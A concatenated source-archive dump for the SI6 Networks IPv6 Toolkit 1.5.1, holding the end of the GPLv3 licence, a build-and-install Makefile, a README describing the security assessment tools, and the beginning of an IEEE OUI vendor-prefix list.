AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. 17. Interpretation of Sections 15 and 16. If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . Also add information on how to contact you by electronic and paper mail. If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode: Copyright (C) This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box". You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see . The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read . ipv6toolkit-1.5.1/Makefile000066400000000000000000000124161223702747200154620ustar00rootroot00000000000000# # SI6 Networks' IPv6 toolkit Makefile # # Notes to package developers: # # By default, binaries will be installed in /usr/local/bin, manual pages in # /usr/local/man, data files in /usr/local/share/ipv6toolkit, and configuration # files in /etc # # The path of the binaries and data files can be overriden by setting "PREFIX" # variable accordingly. The path of the manual pages can be overriden by setting # the MANPREFIX variable. Typically, packages will set these variables as follows: # # PREFIX=/usr # MANPREFIX=/usr/share # # Finally, please note that this makefile supports the DESTDIR variable, as # typically employed by package developers. CC= gcc CFLAGS+= -Wall LDFLAGS+= -lpcap -lm .ifndef(PREFIX) PREFIX=/usr/local .ifndef(MANPREFIX) MANPREFIX=/usr/local .endif .else .ifndef(MANPREFIX) MANPREFIX=/usr/share .endif .endif ETCPATH= $(DESTDIR)/etc MANPATH= $(DESTDIR)$(MANPREFIX)/man DATAPATH= $(DESTDIR)$(PREFIX)/share/ipv6toolkit BINPATH= $(DESTDIR)$(PREFIX)/bin SBINPATH= $(DESTDIR)$(PREFIX)/sbin SRCPATH= tools SBINTOOLS= flow6 frag6 icmp6 jumbo6 na6 ni6 ns6 ra6 rd6 rs6 scan6 tcp6 BINTOOLS= addr6 TOOLS= $(BINTOOLS) $(SBINTOOLS) LIBS= libipv6.o all: $(TOOLS) ipv6toolkit.conf addr6: $(SRCPATH)/addr6.c $(SRCPATH)/addr6.h $(SRCPATH)/ipv6toolkit.h $(CC) $(CPPFLAGS) $(CFLAGS) -o addr6 $(SRCPATH)/addr6.c $(LDFLAGS) flow6: $(SRCPATH)/flow6.c $(SRCPATH)/flow6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o flow6 $(SRCPATH)/flow6.c $(LIBS) $(LDFLAGS) frag6: $(SRCPATH)/frag6.c $(SRCPATH)/frag6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o frag6 $(SRCPATH)/frag6.c $(LIBS) $(LDFLAGS) icmp6: $(SRCPATH)/icmp6.c $(SRCPATH)/icmp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o icmp6 $(SRCPATH)/icmp6.c $(LIBS) $(LDFLAGS) jumbo6: $(SRCPATH)/jumbo6.c $(SRCPATH)/jumbo6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o jumbo6 $(SRCPATH)/jumbo6.c $(LIBS) $(LDFLAGS) na6: $(SRCPATH)/na6.c $(SRCPATH)/na6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o na6 $(SRCPATH)/na6.c $(LIBS) $(LDFLAGS) ni6: $(SRCPATH)/ni6.c $(SRCPATH)/ni6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ni6 $(SRCPATH)/ni6.c $(LIBS) $(LDFLAGS) ns6: $(SRCPATH)/ns6.c $(SRCPATH)/ns6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ns6 $(SRCPATH)/ns6.c $(LIBS) $(LDFLAGS) ra6: $(SRCPATH)/ra6.c $(SRCPATH)/ra6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ra6 $(SRCPATH)/ra6.c $(LIBS) $(LDFLAGS) rd6: $(SRCPATH)/rd6.c $(SRCPATH)/rd6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o rd6 $(SRCPATH)/rd6.c $(LIBS) $(LDFLAGS) rs6: $(SRCPATH)/rs6.c $(SRCPATH)/rs6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o rs6 $(SRCPATH)/rs6.c $(LIBS) $(LDFLAGS) scan6: $(SRCPATH)/scan6.c $(SRCPATH)/scan6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o scan6 $(SRCPATH)/scan6.c $(LIBS) $(LDFLAGS) tcp6: $(SRCPATH)/tcp6.c $(SRCPATH)/tcp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o tcp6 $(SRCPATH)/tcp6.c $(LIBS) $(LDFLAGS) libipv6.o: $(SRCPATH)/libipv6.c $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -c -o libipv6.o $(SRCPATH)/libipv6.c ipv6toolkit.conf: echo "# SI6 Networks' IPv6 Toolkit Configuration File" > \ data/ipv6toolkit.conf echo OUI-Database=$(PREFIX)/share/ipv6toolkit/oui.txt >> \ data/ipv6toolkit.conf clean: rm -f $(TOOLS) $(LIBS) rm -f data/ipv6toolkit.conf install: all # Install the binaries install -m0755 -d $(BINPATH) install -m0755 -d $(SBINPATH) install -m0755 $(BINTOOLS) $(BINPATH) install -m0755 $(SBINTOOLS) $(SBINPATH) # Install the configuration file install -m0644 data/ipv6toolkit.conf $(ETCPATH) # Install the IEEE OUI database install -m0755 -d $(DATAPATH) install -m0644 data/oui.txt $(DATAPATH) # Install the manual pages install -m0755 -d $(MANPATH)/man1 install -m0644 manuals/*.1 $(MANPATH)/man1 install -m0755 -d $(MANPATH)/man5 install -m0644 manuals/*.5 $(MANPATH)/man5 install -m0755 -d $(MANPATH)/man7 install -m0644 manuals/*.7 $(MANPATH)/man7 uninstall: # Remove the binaries rm -f $(BINPATH)/addr6 rm -f $(SBINPATH)/flow6 rm -f $(SBINPATH)/frag6 rm -f $(SBINPATH)/icmp6 rm -f $(SBINPATH)/jumbo6 rm -f $(SBINPATH)/na6 rm -f $(SBINPATH)/ni6 rm -f $(SBINPATH)/ns6 rm -f $(SBINPATH)/ra6 rm -f $(SBINPATH)/rd6 rm -f $(SBINPATH)/rs6 rm -f $(SBINPATH)/scan6 rm -f $(SBINPATH)/tcp6 # Remove the configuration file rm -f $(ETCPATH)/ipv6toolkit.conf # Remove the IEEE OUI database rm -rf $(DATAPATH) # Remove the manual pages rm -f $(MANPATH)/man1/addr6.1 rm -f $(MANPATH)/man1/flow6.1 rm -f $(MANPATH)/man1/frag6.1 rm -f $(MANPATH)/man1/icmp6.1 rm -f $(MANPATH)/man1/jumbo6.1 rm -f $(MANPATH)/man1/na6.1 rm -f $(MANPATH)/man1/ni6.1 rm -f $(MANPATH)/man1/ns6.1 rm -f $(MANPATH)/man1/ra6.1 rm -f $(MANPATH)/man1/rd6.1 rm -f $(MANPATH)/man1/rs6.1 rm -f $(MANPATH)/man1/scan6.1 rm -f $(MANPATH)/man1/tcp6.1 rm -f $(MANPATH)/man5/ipv6toolkit.conf.5 rm -f $(MANPATH)/man7/ipv6toolkit.7 ipv6toolkit-1.5.1/README.TXT000066400000000000000000000024121223702747200153530ustar00rootroot00000000000000******************************************************************************* * SI6 Networks IPv6 Toolkit v1.5 * ******************************************************************************* Description of each of the files and directories: ------------------------------------------------- manuals: Contains the manual pages for the security assessment tools. tools: Contains the source code for the security assessment tools. CHANGES.TXT: Contains the changelog of the toolkit CONTRIB.TXT: Contains the list of people that have contributed to this project. LICENSE.TXT: Contains the license for this software (GPLv3) README.TXT: This file. Building the tools ------------------ You can build the tools by running the following command: make all You can install the tools, configuration file, database, and existing manual pages by running the following command: make install Note: The libpcap library must be previously installed on the system. All the tools have been tested to compile and run on Debian GNU/Linux 6.0, FreeBSD 9.0, NetBSD 6.1.1, OpenBSD 5.3, Ubuntu 11.10, and Mac 0S 10.8.0. Bug reports ----------- Please send any bug reports to Fernando Gont ipv6toolkit-1.5.1/data/000077500000000000000000000000001223702747200147275ustar00rootroot00000000000000ipv6toolkit-1.5.1/data/oui.txt000066400000000000000000022752471223702747200163070ustar00rootroot0000000000000000-00-00 (hex) XEROX CORPORATION 00-00-01 (hex) XEROX CORPORATION 00-00-02 (hex) XEROX CORPORATION 00-00-03 (hex) XEROX CORPORATION 00-00-04 (hex) XEROX CORPORATION 00-00-05 (hex) XEROX CORPORATION 00-00-06 (hex) XEROX CORPORATION 00-00-07 (hex) XEROX CORPORATION 00-00-08 (hex) XEROX CORPORATION 00-00-09 (hex) XEROX CORPORATION 00-00-0A (hex) OMRON TATEISI ELECTRONICS CO. 00-00-0B (hex) MATRIX CORPORATION 00-00-0C (hex) CISCO SYSTEMS, INC. 00-00-0D (hex) FIBRONICS LTD. 00-00-0E (hex) FUJITSU LIMITED 00-00-0F (hex) NEXT, INC. 00-00-10 (hex) SYTEK INC. 00-00-11 (hex) NORMEREL SYSTEMES 00-00-12 (hex) INFORMATION TECHNOLOGY LIMITED 00-00-13 (hex) CAMEX 00-00-14 (hex) NETRONIX 00-00-15 (hex) DATAPOINT CORPORATION 00-00-16 (hex) DU PONT PIXEL SYSTEMS . 00-00-17 (hex) TEKELEC 00-00-18 (hex) WEBSTER COMPUTER CORPORATION 00-00-19 (hex) APPLIED DYNAMICS INTERNATIONAL 00-00-1A (hex) ADVANCED MICRO DEVICES 00-00-1B (hex) NOVELL INC. 00-00-1C (hex) BELL TECHNOLOGIES 00-00-1D (hex) CABLETRON SYSTEMS, INC. 00-00-1E (hex) TELSIST INDUSTRIA ELECTRONICA 00-00-1F (hex) Telco Systems, Inc. 00-00-20 (hex) DATAINDUSTRIER DIAB AB 00-00-21 (hex) SUREMAN COMP. & COMMUN. CORP. 00-00-22 (hex) VISUAL TECHNOLOGY INC. 00-00-23 (hex) ABB INDUSTRIAL SYSTEMS AB 00-00-24 (hex) CONNECT AS 00-00-25 (hex) RAMTEK CORP. 00-00-26 (hex) SHA-KEN CO., LTD. 00-00-27 (hex) JAPAN RADIO COMPANY 00-00-28 (hex) PRODIGY SYSTEMS CORPORATION 00-00-29 (hex) IMC NETWORKS CORP. 00-00-2A (hex) TRW - SEDD/INP 00-00-2B (hex) CRISP AUTOMATION, INC 00-00-2C (hex) AUTOTOTE LIMITED 00-00-2D (hex) CHROMATICS INC 00-00-2E (hex) SOCIETE EVIRA 00-00-2F (hex) TIMEPLEX INC. 00-00-30 (hex) VG LABORATORY SYSTEMS LTD 00-00-31 (hex) QPSX COMMUNICATIONS PTY LTD 00-00-32 (hex) Marconi plc 00-00-33 (hex) EGAN MACHINERY COMPANY 00-00-34 (hex) NETWORK RESOURCES CORPORATION 00-00-35 (hex) SPECTRAGRAPHICS CORPORATION 00-00-36 (hex) ATARI CORPORATION 00-00-37 (hex) OXFORD METRICS LIMITED 00-00-38 (hex) CSS LABS 00-00-39 (hex) TOSHIBA CORPORATION 00-00-3A (hex) CHYRON CORPORATION 00-00-3B (hex) i Controls, Inc. 00-00-3C (hex) AUSPEX SYSTEMS INC. 00-00-3D (hex) UNISYS 00-00-3E (hex) SIMPACT 00-00-3F (hex) SYNTREX, INC. 00-00-40 (hex) APPLICON, INC. 00-00-41 (hex) ICE CORPORATION 00-00-42 (hex) METIER MANAGEMENT SYSTEMS LTD. 00-00-43 (hex) MICRO TECHNOLOGY 00-00-44 (hex) CASTELLE CORPORATION 00-00-45 (hex) FORD AEROSPACE & COMM. CORP. 00-00-46 (hex) OLIVETTI NORTH AMERICA 00-00-47 (hex) NICOLET INSTRUMENTS CORP. 00-00-48 (hex) SEIKO EPSON CORPORATION 00-00-49 (hex) APRICOT COMPUTERS, LTD 00-00-4A (hex) ADC CODENOLL TECHNOLOGY CORP. 00-00-4B (hex) ICL DATA OY 00-00-4C (hex) NEC CORPORATION 00-00-4D (hex) DCI CORPORATION 00-00-4E (hex) AMPEX CORPORATION 00-00-4F (hex) LOGICRAFT, INC. 00-00-50 (hex) RADISYS CORPORATION 00-00-51 (hex) HOB ELECTRONIC GMBH & CO. KG 00-00-52 (hex) Intrusion.com, Inc. 00-00-53 (hex) COMPUCORP 00-00-54 (hex) MODICON, INC. 00-00-55 (hex) COMMISSARIAT A L`ENERGIE ATOM. 00-00-56 (hex) DR. B. STRUCK 00-00-57 (hex) SCITEX CORPORATION LTD. 00-00-58 (hex) RACORE COMPUTER PRODUCTS INC. 00-00-59 (hex) HELLIGE GMBH 00-00-5A (hex) SysKonnect GmbH 00-00-5B (hex) ELTEC ELEKTRONIK AG 00-00-5C (hex) TELEMATICS INTERNATIONAL INC. 00-00-5D (hex) CS TELECOM 00-00-5E (hex) USC INFORMATION SCIENCES INST 00-00-5F (hex) SUMITOMO ELECTRIC IND., LTD. 00-00-60 (hex) KONTRON ELEKTRONIK GMBH 00-00-61 (hex) GATEWAY COMMUNICATIONS 00-00-62 (hex) BULL HN INFORMATION SYSTEMS 00-00-63 (hex) BARCO CONTROL ROOMS GMBH 00-00-64 (hex) YOKOGAWA DIGITAL COMPUTER CORP 00-00-65 (hex) Network General Corporation 00-00-66 (hex) TALARIS SYSTEMS, INC. 00-00-67 (hex) SOFT * RITE, INC. 00-00-68 (hex) ROSEMOUNT CONTROLS 00-00-69 (hex) CONCORD COMMUNICATIONS INC 00-00-6A (hex) COMPUTER CONSOLES INC. 00-00-6B (hex) SILICON GRAPHICS INC./MIPS 00-00-6C (hex) PRIVATE 00-00-6D (hex) CRAY COMMUNICATIONS, LTD. 00-00-6E (hex) ARTISOFT, INC. 00-00-6F (hex) Madge Ltd. 00-00-70 (hex) HCL LIMITED 00-00-71 (hex) ADRA SYSTEMS INC. 00-00-72 (hex) MINIWARE TECHNOLOGY 00-00-73 (hex) SIECOR CORPORATION 00-00-74 (hex) RICOH COMPANY LTD. 00-00-75 (hex) Nortel Networks 00-00-76 (hex) ABEKAS VIDEO SYSTEM 00-00-77 (hex) INTERPHASE CORPORATION 00-00-78 (hex) LABTAM LIMITED 00-00-79 (hex) NETWORTH INCORPORATED 00-00-7A (hex) DANA COMPUTER INC. 00-00-7B (hex) RESEARCH MACHINES 00-00-7C (hex) AMPERE INCORPORATED 00-00-7D (hex) Oracle Corporation 00-00-7E (hex) CLUSTRIX CORPORATION 00-00-7F (hex) LINOTYPE-HELL AG 00-00-80 (hex) CRAY COMMUNICATIONS A/S 00-00-81 (hex) BAY NETWORKS 00-00-82 (hex) LECTRA SYSTEMES SA 00-00-83 (hex) TADPOLE TECHNOLOGY PLC 00-00-84 (hex) SUPERNET 00-00-85 (hex) CANON INC. 00-00-86 (hex) MEGAHERTZ CORPORATION 00-00-87 (hex) HITACHI, LTD. 00-00-88 (hex) Brocade Communications Systems, Inc. 00-00-89 (hex) CAYMAN SYSTEMS INC. 00-00-8A (hex) DATAHOUSE INFORMATION SYSTEMS 00-00-8B (hex) INFOTRON 00-00-8C (hex) Alloy Computer Products (Australia) Pty Ltd 00-00-8D (hex) Cryptek Inc. 00-00-8E (hex) SOLBOURNE COMPUTER, INC. 00-00-8F (hex) Raytheon 00-00-90 (hex) MICROCOM 00-00-91 (hex) ANRITSU CORPORATION 00-00-92 (hex) COGENT DATA TECHNOLOGIES 00-00-93 (hex) PROTEON INC. 00-00-94 (hex) ASANTE TECHNOLOGIES 00-00-95 (hex) SONY TEKTRONIX CORP. 00-00-96 (hex) MARCONI ELECTRONICS LTD. 00-00-97 (hex) EMC Corporation 00-00-98 (hex) CROSSCOMM CORPORATION 00-00-99 (hex) MTX, INC. 00-00-9A (hex) RC COMPUTER A/S 00-00-9B (hex) INFORMATION INTERNATIONAL, INC 00-00-9C (hex) ROLM MIL-SPEC COMPUTERS 00-00-9D (hex) LOCUS COMPUTING CORPORATION 00-00-9E (hex) MARLI S.A. 00-00-9F (hex) AMERISTAR TECHNOLOGIES INC. 00-00-A0 (hex) SANYO Electric Co., Ltd. 00-00-A1 (hex) MARQUETTE ELECTRIC CO. 00-00-A2 (hex) BAY NETWORKS 00-00-A3 (hex) NETWORK APPLICATION TECHNOLOGY 00-00-A4 (hex) ACORN COMPUTERS LIMITED 00-00-A5 (hex) COMPATIBLE SYSTEMS CORP. 00-00-A6 (hex) NETWORK GENERAL CORPORATION 00-00-A7 (hex) NETWORK COMPUTING DEVICES INC. 00-00-A8 (hex) STRATUS COMPUTER INC. 00-00-A9 (hex) NETWORK SYSTEMS CORP. 00-00-AA (hex) XEROX CORPORATION 00-00-AB (hex) LOGIC MODELING CORPORATION 00-00-AC (hex) CONWARE COMPUTER CONSULTING 00-00-AD (hex) BRUKER INSTRUMENTS INC. 00-00-AE (hex) DASSAULT ELECTRONIQUE 00-00-AF (hex) NUCLEAR DATA INSTRUMENTATION 00-00-B0 (hex) RND-RAD NETWORK DEVICES 00-00-B1 (hex) ALPHA MICROSYSTEMS INC. 00-00-B2 (hex) TELEVIDEO SYSTEMS, INC. 00-00-B3 (hex) CIMLINC INCORPORATED 00-00-B4 (hex) EDIMAX COMPUTER COMPANY 00-00-B5 (hex) DATABILITY SOFTWARE SYS. INC. 00-00-B6 (hex) MICRO-MATIC RESEARCH 00-00-B7 (hex) DOVE COMPUTER CORPORATION 00-00-B8 (hex) SEIKOSHA CO., LTD. 00-00-B9 (hex) MCDONNELL DOUGLAS COMPUTER SYS 00-00-BA (hex) SIIG, INC. 00-00-BB (hex) TRI-DATA 00-00-BC (hex) Rockwell Automation 00-00-BD (hex) MITSUBISHI CABLE COMPANY 00-00-BE (hex) THE NTI GROUP 00-00-BF (hex) SYMMETRIC COMPUTER SYSTEMS 00-00-C0 (hex) WESTERN DIGITAL CORPORATION 00-00-C1 (hex) Madge Ltd. 00-00-C2 (hex) INFORMATION PRESENTATION TECH. 00-00-C3 (hex) HARRIS CORP COMPUTER SYS DIV 00-00-C4 (hex) WATERS DIV. OF MILLIPORE 00-00-C5 (hex) FARALLON COMPUTING/NETOPIA 00-00-C6 (hex) EON SYSTEMS 00-00-C7 (hex) ARIX CORPORATION 00-00-C8 (hex) ALTOS COMPUTER SYSTEMS 00-00-C9 (hex) Emulex Corporation 00-00-CA (hex) ARRIS International 00-00-CB (hex) COMPU-SHACK ELECTRONIC GMBH 00-00-CC (hex) DENSAN CO., LTD. 00-00-CD (hex) Allied Telesis Labs Ltd 00-00-CE (hex) MEGADATA CORP. 00-00-CF (hex) HAYES MICROCOMPUTER PRODUCTS 00-00-D0 (hex) DEVELCON ELECTRONICS LTD. 00-00-D1 (hex) ADAPTEC INCORPORATED 00-00-D2 (hex) SBE, INC. 00-00-D3 (hex) WANG LABORATORIES INC. 00-00-D4 (hex) PURE DATA LTD. 00-00-D5 (hex) MICROGNOSIS INTERNATIONAL 00-00-D6 (hex) PUNCH LINE HOLDING 00-00-D7 (hex) DARTMOUTH COLLEGE 00-00-D8 (hex) NOVELL, INC. 00-00-D9 (hex) NIPPON TELEGRAPH & TELEPHONE 00-00-DA (hex) ATEX 00-00-DB (hex) BRITISH TELECOMMUNICATIONS PLC 00-00-DC (hex) HAYES MICROCOMPUTER PRODUCTS 00-00-DD (hex) TCL INCORPORATED 00-00-DE (hex) CETIA 00-00-DF (hex) BELL & HOWELL PUB SYS DIV 00-00-E0 (hex) QUADRAM CORP. 00-00-E1 (hex) GRID SYSTEMS 00-00-E2 (hex) ACER TECHNOLOGIES CORP. 00-00-E3 (hex) INTEGRATED MICRO PRODUCTS LTD 00-00-E4 (hex) IN2 GROUPE INTERTECHNIQUE 00-00-E5 (hex) SIGMEX LTD. 00-00-E6 (hex) APTOR PRODUITS DE COMM INDUST 00-00-E7 (hex) STAR GATE TECHNOLOGIES 00-00-E8 (hex) ACCTON TECHNOLOGY CORP. 00-00-E9 (hex) ISICAD, INC. 00-00-EA (hex) UPNOD AB 00-00-EB (hex) MATSUSHITA COMM. IND. CO. LTD. 00-00-EC (hex) MICROPROCESS 00-00-ED (hex) APRIL 00-00-EE (hex) NETWORK DESIGNERS, LTD. 00-00-EF (hex) KTI 00-00-F0 (hex) SAMSUNG ELECTRONICS CO., LTD. 00-00-F1 (hex) MAGNA COMPUTER CORPORATION 00-00-F2 (hex) SPIDER COMMUNICATIONS 00-00-F3 (hex) GANDALF DATA LIMITED 00-00-F4 (hex) Allied Telesis 00-00-F5 (hex) DIAMOND SALES LIMITED 00-00-F6 (hex) APPLIED MICROSYSTEMS CORP. 00-00-F7 (hex) YOUTH KEEP ENTERPRISE CO LTD 00-00-F8 (hex) DIGITAL EQUIPMENT CORPORATION 00-00-F9 (hex) QUOTRON SYSTEMS INC. 00-00-FA (hex) MICROSAGE COMPUTER SYSTEMS INC 00-00-FB (hex) RECHNER ZUR KOMMUNIKATION 00-00-FC (hex) MEIKO 00-00-FD (hex) HIGH LEVEL HARDWARE 00-00-FE (hex) ANNAPOLIS MICRO SYSTEMS 00-00-FF (hex) CAMTEC ELECTRONICS LTD. 00-01-00 (hex) EQUIP'TRANS 00-01-01 (hex) PRIVATE 00-01-02 (hex) 3COM CORPORATION 00-01-03 (hex) 3COM CORPORATION 00-01-04 (hex) DVICO Co., Ltd. 00-01-05 (hex) Beckhoff Automation GmbH 00-01-06 (hex) Tews Datentechnik GmbH 00-01-07 (hex) Leiser GmbH 00-01-08 (hex) AVLAB Technology, Inc. 00-01-09 (hex) Nagano Japan Radio Co., Ltd. 00-01-0A (hex) CIS TECHNOLOGY INC. 00-01-0B (hex) Space CyberLink, Inc. 00-01-0C (hex) System Talks Inc. 00-01-0D (hex) CORECO, INC. 00-01-0E (hex) Bri-Link Technologies Co., Ltd 00-01-0F (hex) Brocade Communications Systems, Inc. 00-01-10 (hex) Gotham Networks 00-01-11 (hex) iDigm Inc. 00-01-12 (hex) Shark Multimedia Inc. 00-01-13 (hex) OLYMPUS CORPORATION 00-01-14 (hex) KANDA TSUSHIN KOGYO CO., LTD. 00-01-15 (hex) EXTRATECH CORPORATION 00-01-16 (hex) Netspect Technologies, Inc. 00-01-17 (hex) CANAL + 00-01-18 (hex) EZ Digital Co., Ltd. 00-01-19 (hex) RTUnet (Australia) 00-01-1A (hex) EEH DataLink GmbH 00-01-1B (hex) Unizone Technologies, Inc. 00-01-1C (hex) Universal Talkware Corporation 00-01-1D (hex) Centillium Communications 00-01-1E (hex) Precidia Technologies, Inc. 00-01-1F (hex) RC Networks, Inc. 00-01-20 (hex) OSCILLOQUARTZ S.A. 00-01-21 (hex) Watchguard Technologies, Inc. 00-01-22 (hex) Trend Communications, Ltd. 00-01-23 (hex) DIGITAL ELECTRONICS CORP. 00-01-24 (hex) Acer Incorporated 00-01-25 (hex) YAESU MUSEN CO., LTD. 00-01-26 (hex) PAC Labs 00-01-27 (hex) OPEN Networks Pty Ltd 00-01-28 (hex) EnjoyWeb, Inc. 00-01-29 (hex) DFI Inc. 00-01-2A (hex) Telematica Sistems Inteligente 00-01-2B (hex) TELENET Co., Ltd. 00-01-2C (hex) Aravox Technologies, Inc. 00-01-2D (hex) Komodo Technology 00-01-2E (hex) PC Partner Ltd. 00-01-2F (hex) Twinhead International Corp 00-01-30 (hex) Extreme Networks 00-01-31 (hex) Bosch Security Systems, Inc. 00-01-32 (hex) Dranetz - BMI 00-01-33 (hex) KYOWA Electronic Instruments C 00-01-34 (hex) Selectron Systems AG 00-01-35 (hex) KDC Corp. 00-01-36 (hex) CyberTAN Technology, Inc. 00-01-37 (hex) IT Farm Corporation 00-01-38 (hex) XAVi Technologies Corp. 00-01-39 (hex) Point Multimedia Systems 00-01-3A (hex) SHELCAD COMMUNICATIONS, LTD. 00-01-3B (hex) BNA SYSTEMS 00-01-3C (hex) TIW SYSTEMS 00-01-3D (hex) RiscStation Ltd. 00-01-3E (hex) Ascom Tateco AB 00-01-3F (hex) Neighbor World Co., Ltd. 00-01-40 (hex) Sendtek Corporation 00-01-41 (hex) CABLE PRINT 00-01-42 (hex) Cisco Systems, Inc. 00-01-43 (hex) Cisco Systems, Inc. 00-01-44 (hex) EMC Corporation 00-01-45 (hex) WINSYSTEMS, INC. 00-01-46 (hex) Tesco Controls, Inc. 00-01-47 (hex) Zhone Technologies 00-01-48 (hex) X-traWeb Inc. 00-01-49 (hex) T.D.T. Transfer Data Test GmbH 00-01-4A (hex) Sony Corporation 00-01-4B (hex) Ennovate Networks, Inc. 00-01-4C (hex) Berkeley Process Control 00-01-4D (hex) Shin Kin Enterprises Co., Ltd 00-01-4E (hex) WIN Enterprises, Inc. 00-01-4F (hex) ADTRAN INC 00-01-50 (hex) GILAT COMMUNICATIONS, LTD. 00-01-51 (hex) Ensemble Communications 00-01-52 (hex) CHROMATEK INC. 00-01-53 (hex) ARCHTEK TELECOM CORPORATION 00-01-54 (hex) G3M Corporation 00-01-55 (hex) Promise Technology, Inc. 00-01-56 (hex) FIREWIREDIRECT.COM, INC. 00-01-57 (hex) SYSWAVE CO., LTD 00-01-58 (hex) Electro Industries/Gauge Tech 00-01-59 (hex) S1 Corporation 00-01-5A (hex) Digital Video Broadcasting 00-01-5B (hex) ITALTEL S.p.A/RF-UP-I 00-01-5C (hex) CADANT INC. 00-01-5D (hex) Oracle Corporation 00-01-5E (hex) BEST TECHNOLOGY CO., LTD. 00-01-5F (hex) DIGITAL DESIGN GmbH 00-01-60 (hex) ELMEX Co., LTD. 00-01-61 (hex) Meta Machine Technology 00-01-62 (hex) Cygnet Technologies, Inc. 00-01-63 (hex) Cisco Systems, Inc. 00-01-64 (hex) Cisco Systems, Inc. 00-01-65 (hex) AirSwitch Corporation 00-01-66 (hex) TC GROUP A/S 00-01-67 (hex) HIOKI E.E. CORPORATION 00-01-68 (hex) VITANA CORPORATION 00-01-69 (hex) Celestix Networks Pte Ltd. 00-01-6A (hex) ALITEC 00-01-6B (hex) LightChip, Inc. 00-01-6C (hex) FOXCONN 00-01-6D (hex) CarrierComm Inc. 00-01-6E (hex) Conklin Corporation 00-01-6F (hex) Inkel Corp. 00-01-70 (hex) ESE Embedded System Engineer'g 00-01-71 (hex) Allied Data Technologies 00-01-72 (hex) TechnoLand Co., LTD. 00-01-73 (hex) AMCC 00-01-74 (hex) CyberOptics Corporation 00-01-75 (hex) Radiant Communications Corp. 00-01-76 (hex) Orient Silver Enterprises 00-01-77 (hex) EDSL 00-01-78 (hex) MARGI Systems, Inc. 00-01-79 (hex) WIRELESS TECHNOLOGY, INC. 00-01-7A (hex) Chengdu Maipu Electric Industrial Co., Ltd. 00-01-7B (hex) Heidelberger Druckmaschinen AG 00-01-7C (hex) AG-E GmbH 00-01-7D (hex) ThermoQuest 00-01-7E (hex) ADTEK System Science Co., Ltd. 00-01-7F (hex) Experience Music Project 00-01-80 (hex) AOpen, Inc. 00-01-81 (hex) Nortel Networks 00-01-82 (hex) DICA TECHNOLOGIES AG 00-01-83 (hex) ANITE TELECOMS 00-01-84 (hex) SIEB & MEYER AG 00-01-85 (hex) Hitachi Aloka Medical, Ltd. 00-01-86 (hex) Uwe Disch 00-01-87 (hex) i2SE GmbH 00-01-88 (hex) LXCO Technologies ag 00-01-89 (hex) Refraction Technology, Inc. 00-01-8A (hex) ROI COMPUTER AG 00-01-8B (hex) NetLinks Co., Ltd. 00-01-8C (hex) Mega Vision 00-01-8D (hex) AudeSi Technologies 00-01-8E (hex) Logitec Corporation 00-01-8F (hex) Kenetec, Inc. 00-01-90 (hex) SMK-M 